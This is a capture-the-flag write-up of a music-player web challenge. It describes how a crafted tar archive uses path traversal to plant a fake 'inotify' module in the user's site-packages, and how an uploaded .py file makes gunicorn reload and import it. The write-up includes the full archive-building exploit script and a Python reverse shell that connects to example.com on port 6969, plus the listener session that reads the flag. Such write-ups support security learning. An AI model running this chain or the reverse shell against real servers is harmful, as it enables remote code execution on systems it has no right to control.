Introduction



This was a really fun challenge that, I would say, leans a bit more towards Python skills and reading the source of larger components of the Python web development ecosystem. The design of the challenge is very simple, and it does in fact play music (to be honest, I never actually managed to use the music playing functionality as intended). Basically, it’s an app where you can upload archives of audio files, which are converted into playlists you can click to play.

During the container build, a setuid binary (/readflag) is created that prints the flag when executed, while the flag file itself cannot be read by the ctf user. This is typical for challenges that require Remote Code Execution, so we assume that is our goal.

Challenge details

I’m tired of Spotify, so I’m developing my own music player app.

Summary

The solution involves chaining several techniques:

- a path traversal in shutil.unpack_archive that lets us write files to paths of our choice (keep in mind we are running as the ctf user).
- the autoreload script restarts the gunicorn processes whenever a change to a file with a .py extension is detected in /app. Conveniently, /app contains uploads and db, and our extracted files end up in uploads. There is no validation to stop archives from containing .py files, so we can simply put a file with the .py extension in the archive to trigger a reload.
- an RCE gadget of our choice that gets triggered on a reload. For this I chose something extremely specific in gunicorn that was a bit surprising to me, but others (see the “Challenge author Insights” section) were also possible.
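The core of the traversal can be sketched with os.path.join, which throws away everything before an absolute component. The helpers below are hypothetical. They model an extractor that simply joins the destination directory with each member name and applies no filtering, which is the behaviour the exploit depends on. The /app/uploads/playlist destination is an assumed example, not the challenge’s real path.

```python
import os

def resolve_member_path(dest: str, member_name: str) -> str:
    """Hypothetical helper: where a naive, unfiltered extractor would write a member."""
    # os.path.join discards `dest` entirely when `member_name` is absolute.
    return os.path.normpath(os.path.join(dest, member_name))

def escapes_dest(dest: str, member_name: str) -> bool:
    """True if the member would land outside the extraction directory."""
    root = os.path.normpath(dest)
    target = resolve_member_path(dest, member_name)
    return os.path.commonpath([root, target]) != root

DEST = "/app/uploads/playlist"  # assumed extraction directory, for illustration only
for name in ("trigger.py",
             "../../traversal_tar.txt",
             "/home/ctf/.local/lib/python3.11/site-packages/inotify.py"):
    print(f"{name!r:60} -> {resolve_member_path(DEST, name)} "
          f"(escapes: {escapes_dest(DEST, name)})")
```

The relative trigger.py stays inside the upload directory, which is exactly what we want for it. The absolute inotify.py path ends up wherever it names.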

Feel free to skip to the section you’re interested in using the headers on the sidebar to the left.

initial arbitrary file write code

DISCLAIMER: I had a large language model (Gemini 2.5 Pro, because I value my Claude message quota) write most of the archive-crafting code, since it felt contrived enough to be within the capabilities of the models.

```python
# I tried to remove some slop but this is not the exact script I used at solve time.
# the payload was still called main_pwned.py because I tried to overwrite the main.py file at first
import tarfile
import os
import sys
import io

new_app_contents = b""

try:
    with open("app/main_pwned.py", "rb") as f:
        new_app_contents = f.read()
except FileNotFoundError:
    print("[-] Error: 'app/main_pwned.py' not found. Please create this file with your malicious code.")
    sys.exit(1)

def make_folder(path):
    t = tarfile.TarInfo(name=path)
    t.type = tarfile.DIRTYPE
    t.mode = 0o777
    return t

def create_malicious_tar(tar_name="malicious.tar"):
    """
    Creates a TAR file with entries designed to exploit path traversal.
    Targets the ctf user's site-packages (inotify.py) and also drops a
    trigger.py into the extraction directory to set off the autoreloader.
    """
    print(f"[+] Creating malicious tar file: {tar_name}")

    target_path = "/home/ctf/.local/lib/python3.11/site-packages/inotify.py"

    try:
        with tarfile.open(tar_name, 'w') as tar:
            # we need to write the folders first
            tar.addfile(make_folder("/home/ctf/.local/lib/python3.11/site-packages"))
            tar.addfile(make_folder("/home/ctf/.local"))
            tar.addfile(make_folder("/home/ctf/.local/lib"))
            tar.addfile(make_folder("/home/ctf/.local/lib/python3.11"))
            tar.addfile(make_folder("/home/ctf/.local/lib/python3.11/site-packages"))

            # Create a TarInfo object for the target path (and one for the reload trigger)
            tarinfo = tarfile.TarInfo(name=target_path)
            tarinfo.size = len(new_app_contents)
            tarinfo2 = tarfile.TarInfo(name="trigger.py")
            tarinfo2.size = len(new_app_contents)

            # Use BytesIO to create a file-like object from the content
            content_io = io.BytesIO(new_app_contents)
            content_io2 = io.BytesIO(new_app_contents)

            # Add the malicious file entries to the tar archive
            print(f"[+] Adding payload: {target_path}")
            tar.addfile(tarinfo, content_io)
            tar.addfile(tarinfo2, content_io2)

            # Optional: Add other traversal attempts if desired
            # Example relative path traversal (less reliable in tar compared to zip with shutil)
            # traversal_tarinfo = tarfile.TarInfo(name="../../traversal_tar.txt")
            # traversal_content = b"This is a relative traversal attempt via tar!"
            # traversal_tarinfo.size = len(traversal_content)
            # tar.addfile(traversal_tarinfo, io.BytesIO(traversal_content))
            # print(f"[+] Adding entry: ../../traversal_tar.txt")

        print(f"[+] Malicious TAR created successfully: {tar_name}")
        print(f"[!] It contains an entry targeting: {target_path}")
    except Exception as e:
        print(f"[-] Error creating tar file: {e}")
        sys.exit(1)

if __name__ == "__main__":
    create_malicious_tar()
```

but why can’t we just overwrite the source code?

Great question! A lot of the time people are quite lazy when writing their Dockerfiles and forget to separate privileges.

By default, a Dockerfile runs everything as the root user, which is extremely useful for installing software and making big changes to the system. However, staying root is not exactly good security, since file permissions effectively don’t exist beyond whatever restrictions are placed on the container.

A lot of real-world containers run like this by default, which is a bit annoying: if the main application process is compromised, the entire container’s filesystem can be modified at will, for example to hide backdoors.

However, this challenge avoids running everything as root by creating a new user with the username ctf and running the challenge under them. Here is the full Dockerfile:

```dockerfile
FROM python:3.11-slim-bookworm@sha256:82c07f2f6e35255b92eb16f38dbd22679d5e8fb523064138d7c6468e7bf0c15b

RUN apt-get update && apt-get -y upgrade && apt-get -y install procps

COPY requirements.txt /requirements.txt
RUN python3 -m venv --system-site-packages venv && . venv/bin/activate && \
    pip install -r /requirements.txt && rm /requirements.txt
COPY ./app /app
COPY flag.txt /flag.txt
COPY readflag /readflag

RUN chmod 600 /flag.txt && chmod 4755 readflag && \
    groupadd ctf && useradd -m -g ctf ctf && \
    mkdir -p /app/uploads && chown ctf /app/uploads && \
    mkdir -p /db && chown ctf /db

USER ctf

ENV PYTHONUNBUFFERED=1
CMD ["/app/start.sh"]
```

Note: the venv does not affect the solve of the challenge. From this Dockerfile, we can deduce that the app is initially set up as root by the COPY statements.

This means these files are owned by root as well (COPY creates files owned by root unless --chown is given). The Dockerfile does create a directory for uploads and a directory for the database and transfers ownership of them to the ctf user, which is the minimum the app needs, but every other directory is still owned by root.

Hmmm… this means that if we try to extract on top of the source code, the operating system will throw a permission error, because the ctf user is simply not allowed to overwrite a file owned by root (I found this out by failing locally).
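The permission reasoning can be modelled with a simplified POSIX write check. This is only a sketch. It ignores ACLs, capabilities and the separate directory-write permission needed to create new files. The uid/gid of 1000 for ctf and the 0o644 mode for the copied source files are assumptions, not values read from the challenge. The 0o600 and 0o4755 modes come straight from the Dockerfile.

```python
import stat

def may_write(mode: int, owner_uid: int, owner_gid: int,
              uid: int, gids: set[int]) -> bool:
    """Simplified owner/group/other write check (no ACLs or capabilities)."""
    if uid == 0:
        return True  # root bypasses the permission bits (simplification)
    if uid == owner_uid:
        return bool(mode & stat.S_IWUSR)
    if owner_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

ROOT, CTF = 0, 1000   # assumed uids; the real ctf uid may differ
CTF_GIDS = {1000}     # assumed gid of the ctf group

# A COPY'd source file, assumed root:root with mode 0o644: not writable by ctf.
print(stat.filemode(stat.S_IFREG | 0o644), may_write(0o644, ROOT, ROOT, CTF, CTF_GIDS))
# /app/uploads after `chown ctf` (group stays root), assumed mode 0o755: writable.
print(stat.filemode(stat.S_IFDIR | 0o755), may_write(0o755, CTF, ROOT, CTF, CTF_GIDS))
# /flag.txt after `chmod 600` and /readflag after `chmod 4755` (note the setuid "s").
print(stat.filemode(stat.S_IFREG | 0o600))
print(stat.filemode(stat.S_IFREG | 0o4755))
```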

you’re not really in control are you? but what do you control?

Uploads and db are what I consider “data” directories. It’s very unlikely that anything in them will be executed as code.

Here’s where some neat Linux and Python knowledge comes in handy.

When useradd -m is run to create the ctf user, the user needs somewhere to store their files, so a home directory is created at /home/ctf.

You can verify this by getting a quick shell into your local container. But containers are built from a minimalistic mindset, so there’s not much to see in terms of content even if we show hidden files.

```console
ctf@ee91a87b6b0d:/$ ls -lAh /home/ctf
total 12K
-rw-r--r-- 1 ctf ctf 220 Mar 29 2024 .bash_logout
-rw-r--r-- 1 ctf ctf 3.5K Mar 29 2024 .bashrc
-rw-r--r-- 1 ctf ctf 807 Mar 29 2024 .profile
```

From here I got an idea. We can’t poison the source code because of permissions, but we can probably do the next best thing and poison something the code depends on, since Python lets you install modules on a per-user basis, and those live in a Python folder under .local in your home directory.

Initially, I was slightly confused about why sys.path only contained system paths under /usr. During the CTF I had Docker issues, so I just SSHed into a recently set up Raspberry Pi and got the same result.

```console
ctf@ee91a87b6b0d:/$ python3.11 -c "import sys; print(sys.path)"
['', '/usr/local/lib/python311.zip', '/usr/local/lib/python3.11', '/usr/local/lib/python3.11/lib-dynload', '/usr/local/lib/python3.11/site-packages']
```

a tangent on python’s import path

This baffled me for a few minutes, so I ran a quick experiment. If Python really only looked in those paths, pip’s --user option would be broken, which is clearly not the case. So I ran the following:

```console
ctf@ee91a87b6b0d:/$ python3.11 -m pip install --user tqdm
Collecting tqdm
  Downloading tqdm-4.67.1-py3-none-any.whl.metadata (57 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 57.7/57.7 kB 4.1 MB/s eta 0:00:00
Downloading tqdm-4.67.1-py3-none-any.whl (78 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 78.5/78.5 kB 13.3 MB/s eta 0:00:00
Installing collected packages: tqdm
  WARNING: The script tqdm is installed in '/home/ctf/.local/bin' which is not on PATH.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed tqdm-4.67.1

[notice] A new release of pip is available: 24.0 -> 25.0.1
[notice] To update, run: pip install --upgrade pip
ctf@ee91a87b6b0d:/$ python3.11 -c "import sys; print(sys.path)"
['', '/usr/local/lib/python311.zip', '/usr/local/lib/python3.11', '/usr/local/lib/python3.11/lib-dynload', '/home/ctf/.local/lib/python3.11/site-packages', '/usr/local/lib/python3.11/site-packages']
```

After a bit more experimentation (resetting the container one more time), it turns out we just need to create the user site-packages directory ourselves, which I do in the tar creation script with the following lines.

```python
tar.addfile(make_folder("/home/ctf/.local/lib/python3.11/site-packages"))
tar.addfile(make_folder("/home/ctf/.local"))
tar.addfile(make_folder("/home/ctf/.local/lib"))
tar.addfile(make_folder("/home/ctf/.local/lib/python3.11"))
tar.addfile(make_folder("/home/ctf/.local/lib/python3.11/site-packages"))
```

where make_folder is just a helper that builds a directory entry for the tar file:

```python
def make_folder(path):
    t = tarfile.TarInfo(name=path)
    t.type = tarfile.DIRTYPE
    t.mode = 0o777
    return t
```

NOTE: Without setting the mode when creating the directories, some permission issues would result, making them not viewable even by the ctf user (a TarInfo defaults to mode 0o644, which has no execute bit, and a directory without the execute bit can’t be entered).
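The directory-mode issue is easy to check without touching the filesystem: build a tiny archive in memory and read the entries back. This sketch reuses the make_folder helper from the exploit script and compares it with a directory entry left at TarInfo’s default mode. The list_entries name is a hypothetical helper.

```python
import io
import tarfile

def make_folder(path):
    # Same helper as in the exploit script: a directory entry with mode 0o777.
    t = tarfile.TarInfo(name=path)
    t.type = tarfile.DIRTYPE
    t.mode = 0o777
    return t

def list_entries(data: bytes):
    # Read an in-memory archive back and report (name, is_dir, mode) per member.
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        return [(m.name, m.isdir(), m.mode) for m in tar.getmembers()]

buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    tar.addfile(make_folder("/home/ctf/.local"))
    default_dir = tarfile.TarInfo(name="/home/ctf/.local/lib")
    default_dir.type = tarfile.DIRTYPE  # mode left at TarInfo's default
    tar.addfile(default_dir)

for name, is_dir, mode in list_entries(buf.getvalue()):
    print(name, is_dir, oct(mode))
```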

I set them to 777 because it was the first thing that came to mind, and it basically allows every file operation.
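Creating the directory is enough because of how the standard site module works. At startup it only adds the per-user site-packages directory to sys.path when user site-packages are enabled and that directory already exists. Inside a virtual environment, site also disables the user directory unless the venv was created with --system-site-packages, which is how the challenge’s venv was built. The helper below is a hypothetical sketch for inspecting this from any interpreter.

```python
import os
import site
import sys

def user_site_status() -> dict:
    """Hypothetical helper: is the per-user site-packages directory enabled,
    present on disk, and actually on sys.path for this interpreter?"""
    user_site = site.getusersitepackages()
    return {
        "path": user_site,
        "enabled": bool(site.ENABLE_USER_SITE),
        "exists": os.path.isdir(user_site),
        "on_sys_path": user_site in sys.path,
    }

for key, value in user_site_status().items():
    print(f"{key:12} {value}")
```

On a fresh container this should show the directory missing and off sys.path. Once the archive has created it, a newly started interpreter picks it up.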

So now which package do we poison? Standard library modules are out, since their directories come before the user site-packages in sys.path (as the output above shows). What we need is a package that isn’t in the container by default but that something attempts to import anyway, so our planted copy is the only one Python can find.
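Whether a package is importable in a given environment can be checked without executing it by using importlib.util.find_spec. This hypothetical helper only looks at the top-level name, because calling find_spec on a dotted name imports the parent package first and raises ModuleNotFoundError if that parent is missing.

```python
import importlib.util

def missing_modules(names):
    """Return the names whose top-level package cannot be found on sys.path."""
    missing = []
    for name in names:
        top_level = name.split(".")[0]
        if importlib.util.find_spec(top_level) is None:
            missing.append(name)
    return missing

# Inside the challenge container, the inotify entries should be reported missing.
print(missing_modules(["flask", "gunicorn", "inotify.adapters", "inotify.constants"]))
```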

the quest for a package that isn’t there by default

Enter “optional packages”. It’s quite common for libraries to have extra dependencies that are not installed automatically when you install the library via pip, but can be installed manually to provide additional features. Usually it’s something like a native implementation of something that doesn’t work across platforms, a new async runtime, database drivers, and similar things. Researching these packages took up the most time here.

candidate 1: flask

skip this if you’re not interested in a dead end: I didn’t find anything too interesting in the flask source code.

In the official documentation I found that if python-dotenv is installed, flask automatically attempts to use it to load .env files.

Unfortunately for us, the .env loading functionality only exists within flask’s CLI, which is used for development only and is not invoked by gunicorn in any way. gunicorn simply imports main.py to get the app variable, so it bypasses a lot of flask’s own web server machinery.

I started searching for except ImportError statements on GitHub and found a few results most of which were in tests.

One result showed that Flask also has support for what appears to be “async views”, where it’ll attempt to import asgiref:

```python
def async_to_sync(
    self, func: t.Callable[..., t.Coroutine[t.Any, t.Any, t.Any]]
) -> t.Callable[..., t.Any]:
    """Return a sync function that will run the coroutine function.

    .. code-block:: python

        result = app.async_to_sync(func)(*args, **kwargs)

    Override this method to change how the app converts async code
    to be synchronously callable.

    .. versionadded:: 2.0
    """
    try:
        from asgiref.sync import async_to_sync as asgiref_async_to_sync
    except ImportError:
        raise RuntimeError(
            "Install Flask with the 'async' extra in order to use async views."
        ) from None

    return asgiref_async_to_sync(func)
```

But we don’t really have any async code to trigger this code path, and it would likely require one of the “async views” mentioned in the error message.

a revelation

Tip: always look for places where something differs from the well-known way of doing things. Early in my investigation of autoreloading, I noticed that the challenge rolls its own development autoreload script, which surprised me a bit because gunicorn has a built-in autoreload feature (its --reload setting). The script looks like this:

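```sh
#!/bin/sh
# for development purposes

watchmedo shell-command \
--patterns='*.py' \
--recursive \
--command='pid=$(pgrep -f gunicorn | head -1); kill -s USR2 $pid; kill -s TERM $pid' \
/app
```

For those not familiar, gunicorn works by having a master process spawn a few worker children that all run the same flask application. Whenever a .py file under /app changes, the script sends USR2 to the first gunicorn process pgrep finds (presumably the master), which tells a gunicorn master to re-exec itself as a new master, and then TERM to shut down the old one. The fresh process imports gunicorn’s modules all over again, which we can use to our advantage.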
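To make the trigger condition concrete, here is a rough Python model of what the script does. It is an approximation and does not reproduce watchdog’s actual matching code. A path counts if it sits anywhere under /app (--recursive) and its file name matches *.py. The restart step then sends SIGUSR2 followed by SIGTERM to a single pid. The function names are hypothetical, and the kill function is injectable so the sketch can be exercised without signalling a real process.

```python
import fnmatch
import os
import signal

WATCH_ROOT = "/app"     # the directory passed to watchmedo
PATTERNS = ["*.py"]     # --patterns='*.py'

def should_reload(path: str) -> bool:
    """Approximate the watcher: any *.py file anywhere under /app."""
    inside = os.path.commonpath([WATCH_ROOT, path]) == WATCH_ROOT
    return inside and any(fnmatch.fnmatch(os.path.basename(path), p) for p in PATTERNS)

def restart_master(pid: int, kill=os.kill) -> None:
    """Mirror the --command: USR2 (re-exec a new master), then TERM the old one."""
    kill(pid, signal.SIGUSR2)
    kill(pid, signal.SIGTERM)

print(should_reload("/app/uploads/playlist/trigger.py"))      # our trigger file
print(should_reload("/app/uploads/playlist/track.mp3"))       # normal upload
print(should_reload("/home/ctf/.local/lib/python3.11/site-packages/inotify.py"))
```

This is why the archive needs both files. inotify.py lives outside /app and never fires the watcher by itself. trigger.py lands inside /app/uploads and does.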

candidate 2: gunicorn

gunicorn is a lot more interesting from an attack surface perspective because it does a lot of fancier things, and it has many optional packages that can be installed to improve functionality.

manual searching

gunicorn doesn’t take the “try and import” approach on each module though, which makes sense because importing multiple async libraries sounds like a recipe for bugs. I’m honestly not surprised because it’s not uncommon for importing libraries to cause random side effects.

Here is a list of files that try to use these optional packages. These are likely not imported by default because they raise exceptions when their dependency is missing.



github copilot abuse

I was getting tired of manually crafting unreliable patterns for the GitHub search engine, so I pivoted to abusing a GitHub Copilot feature where you can reference a repository as a source in a chat session.

Based on a code search, here are some modules that benoitc/gunicorn tries to import within a try...except ImportError block:

- os.closerange: In gunicorn/util.py, it attempts to import closerange from os. If the import fails (as it might on some systems), it defines its own fallback implementation.
- sphinx_rtd_theme: In docs/source/conf.py, it tries to import this theme for building documentation. If unavailable, it defaults to the standard Sphinx theme.
- routes: In examples/multiapp.py, it attempts to import Mapper from routes. If it fails, it prints a message indicating the dependency is missing.
- tornado: In gunicorn/workers/gtornado.py, it tries to import tornado. If the import fails, it raises a RuntimeError because the Tornado worker cannot function without it.
- eventlet: In gunicorn/workers/geventlet.py, it tries to import eventlet. Similar to Tornado, if the import fails or the version is too old, it raises a RuntimeError.
- gevent: In gunicorn/workers/ggevent.py, it tries to import gevent. Like the other async workers, it raises a RuntimeError if gevent is missing or the version is too old.
- inotify: In gunicorn/reloader.py, it tries to import Inotify and related constants from the inotify package (on Linux). If the import fails, it sets has_inotify = False and falls back to a polling-based reloader. If the InotifyReloader class is explicitly used without the module installed, it raises an ImportError.

Please note that code search results may be incomplete. You can view more results in the GitHub UI.

Of all the items on the list, the inotify usage stood out to me.
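The try/except ImportError hunting above, first by hand and then through Copilot, can also be done locally on a checked-out source tree. The sketch below was not part of the original solve, and its function names are hypothetical. It parses source with the standard ast module and lists the modules imported inside try blocks whose handlers catch ImportError or ModuleNotFoundError. The sample input reproduces the has_inotify pattern from gunicorn/reloader.py.

```python
import ast

IMPORT_ERRORS = {"ImportError", "ModuleNotFoundError"}

def _handler_names(expr):
    """Names of the exception classes caught by an `except` clause."""
    if isinstance(expr, ast.Name):
        return {expr.id}
    if isinstance(expr, ast.Attribute):
        return {expr.attr}
    if isinstance(expr, ast.Tuple):
        names = set()
        for elt in expr.elts:
            names |= _handler_names(elt)
        return names
    return set()

def optional_imports(source: str) -> list[str]:
    """Modules imported inside try blocks that catch ImportError."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Try):
            continue
        if not any(h.type is not None and _handler_names(h.type) & IMPORT_ERRORS
                   for h in node.handlers):
            continue
        for stmt in node.body:
            for sub in ast.walk(stmt):
                if isinstance(sub, ast.Import):
                    found.extend(alias.name for alias in sub.names)
                elif isinstance(sub, ast.ImportFrom) and sub.module:
                    found.append(sub.module)
    return found

GUNICORN_SNIPPET = """
has_inotify = False
if sys.platform.startswith('linux'):
    try:
        from inotify.adapters import Inotify
        import inotify.constants
        has_inotify = True
    except ImportError:
        pass
"""
print(optional_imports(GUNICORN_SNIPPET))
```

To scan a whole checkout, the same function can be applied to the text of every file from pathlib.Path("gunicorn").rglob("*.py").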

the inotify optimization

```python
has_inotify = False
if sys.platform.startswith('linux'):
    try:
        from inotify.adapters import Inotify
        import inotify.constants
        has_inotify = True
    except ImportError:
        pass
```

Initially I assumed inotify was something preinstalled with Python on Linux so programs could use it for optimized file watching. But I’m not a Python expert and don’t know every module in the standard library, so it wouldn’t hurt to check. My main laptop has a really messy environment, with a lot of stuff installed into my user’s Python install, so as a quick sanity check I pulled up an interactive prompt and…

```console
raymond@nobara:~$ python
Python 3.13.2 (main, Feb 4 2025, 00:00:00) [GCC 14.2.1 20250110 (Red Hat 14.2.1-7)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import inotify.constants
Traceback (most recent call last):
  File "<python-input-0>", line 1, in <module>
    import inotify.constants
ModuleNotFoundError: No module named 'inotify'
>>> import inotify
Traceback (most recent call last):
  File "<python-input-1>", line 1, in <module>
    import inotify
ModuleNotFoundError: No module named 'inotify'
>>>
```

It didn’t exist. I quickly checked the challenge container as well. Nope.

```console
ctf@ee91a87b6b0d:/$ source venv/bin/activate
(venv) ctf@ee91a87b6b0d:/$ python3
Python 3.11.12 (main, Apr 9 2025, 18:23:23) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import inotify
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ModuleNotFoundError: No module named 'inotify'
>>>
```

We’ve finally got our module to hijack!

Solution

So now we can hijack inotify enough to have arbitrary code execution.
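Planting a module is enough for code execution because a module’s top-level code runs the moment it is first imported, before the importer uses anything from it. The sketch below demonstrates this harmlessly. A temporary directory stands in for the user site-packages directory, and a made-up module name (fake_optional_dep, hypothetical) stands in for inotify. It also mirrors the gunicorn pattern: the planted file is a plain module rather than a package, so the `from ... .adapters import` fails with an ImportError that the caller swallows, but by then the module body has already run.

```python
import importlib
import os
import sys
import tempfile

PLANTED = "fake_optional_dep"  # hypothetical stand-in for inotify

def simulate_hijack() -> bool:
    """Plant a module on sys.path, run a gunicorn-style optional import,
    and report whether the planted module's top-level code executed."""
    with tempfile.TemporaryDirectory() as tmp:
        module_path = os.path.join(tmp, PLANTED + ".py")
        # Harmless "payload": create a marker file next to the module.
        with open(module_path, "w") as f:
            f.write("open(__file__ + '.ran', 'w').close()\n")
        sys.path.insert(0, tmp)  # plays the role of the user site-packages dir
        importlib.invalidate_caches()
        try:
            try:
                # Same shape as the optional import in gunicorn/reloader.py.
                from fake_optional_dep.adapters import Inotify  # noqa: F401
            except ImportError:
                pass  # the importer quietly gives up...
            # ...but the planted module body has already executed.
            return os.path.exists(module_path + ".ran")
        finally:
            sys.path.remove(tmp)
            sys.modules.pop(PLANTED, None)

print(simulate_hijack())
```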

My original plan was to modify the main app a bit, but unfortunately I didn’t know enough Python to reach the app variable from another module, nor did I feel like spoofing enough of the inotify module to keep the code that depends on it from erroring.

So I had to settle for a canned reverse shell through that one website everyone uses to generate them.

```python
import sys

# writeup note:
# not sure if this is needed
# but this makes fake submodules I think?
sys.modules["inotify.adapters"] = {"Inotify": {"actual": "scam"}}
sys.modules["inotify.constants"] = {"uwu": "orzlarru"}

import time

print("PWNED")  # writeup note: this was so I could see the exploit running on local docker since I could see stdout
time.sleep(10)  # the remote is somewhat blind so I can detect if I need to prepare reverse shell if the server freezes with this

import os
import pty
import socket

s = socket.socket()
s.connect(("example.com", 6969))
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)  # point stdin/stdout/stderr at the socket
pty.spawn("sh")

time.sleep(1000)
```

The payload itself is minimal, as most of the exploit relies on the tar creation script, specifically the location of the file being created. The fake module is bare-bones; I wouldn’t be surprised if the server crashed right after exiting the shell, but it works well enough to get the flag.

Now, all that’s left is to upload our specially crafted tar file and get the flag.

```console
nc -lvnp 6969
Listening on 0.0.0.0 6969
Connection received on 34.27.115.92 33628
(venv) $ ls
ls
app boot dev flag.txt lib media opt readflag run srv tmp var
bin db etc home lib64 mnt proc root sbin sys usr venv
(venv) $ whoami
whoami
ctf
(venv) $ /readflag
/readflag
bctf{dont_develop_on_prod_cb7f181b}
(venv) $
```

The flag is a reference to the fact that autoreload is a development feature. It lets you make changes to your code and see the results immediately, which cuts a lot of dev cycle time, but it is typically never used in production.

Challenge author Insights

The challenge author has been nice enough to include various alternate solve routes on their GitHub here. The author also documents a more efficient way to detect module import attempts, which involves patching ModuleNotFoundError globally. Additionally, there are several other places where you could aim your arbitrary file write.
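A related technique for spotting failed imports, which is not the author’s ModuleNotFoundError patch, is a finder appended to the end of sys.meta_path. Python only consults it after the built-in, frozen and path-based finders have all failed, so it sees exactly the imports that are about to fail. A minimal sketch follows. The class and function names are hypothetical.

```python
import importlib
import importlib.abc
import sys

class MissingImportRecorder(importlib.abc.MetaPathFinder):
    """Records every module name that no earlier finder could locate."""

    def __init__(self):
        self.missing = []

    def find_spec(self, fullname, path, target=None):
        self.missing.append(fullname)
        return None  # decline, so the import still fails normally

def probe(names):
    """Try importing each name with the recorder installed; return the misses."""
    recorder = MissingImportRecorder()
    sys.meta_path.append(recorder)  # last in line: only sees unresolved imports
    try:
        for name in names:
            try:
                importlib.import_module(name)
            except ImportError:
                pass
    finally:
        sys.meta_path.remove(recorder)
    return recorder.missing

print(probe(["json", "inotify.adapters"]))
```

For a dotted name such as inotify.adapters, the recorder would see the parent inotify first, since that is the import that fails.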

Closing Thoughts



Welp! That was a super fun challenge and I really enjoyed it during the CTF. I mostly tried to speedrun it as a personal challenge, but surprisingly got first blood as well. Before the rCTF instance goes down, I’d like to add this screenshot of the solves this challenge got during the CTF.

3 other teams also solved this so I’m curious about what chains they used to RCE the server as well since I think the challenge design will definitely lead to creative and interesting solutions.


Also, from what I gathered on the Discord, part of the rCTF theming for this CTF involved animations playing when you submitted flags. Unfortunately, I never saw this cool touch because of the flag submission proxy I used 😔😔😔. This challenge in particular was one of the cleanest, highest-quality web challenges I’ve seen in a while, without too much emphasis on guessing (my personal opinion is that flask and gunicorn are medium-sized codebases and easy to read because they’re mostly Python).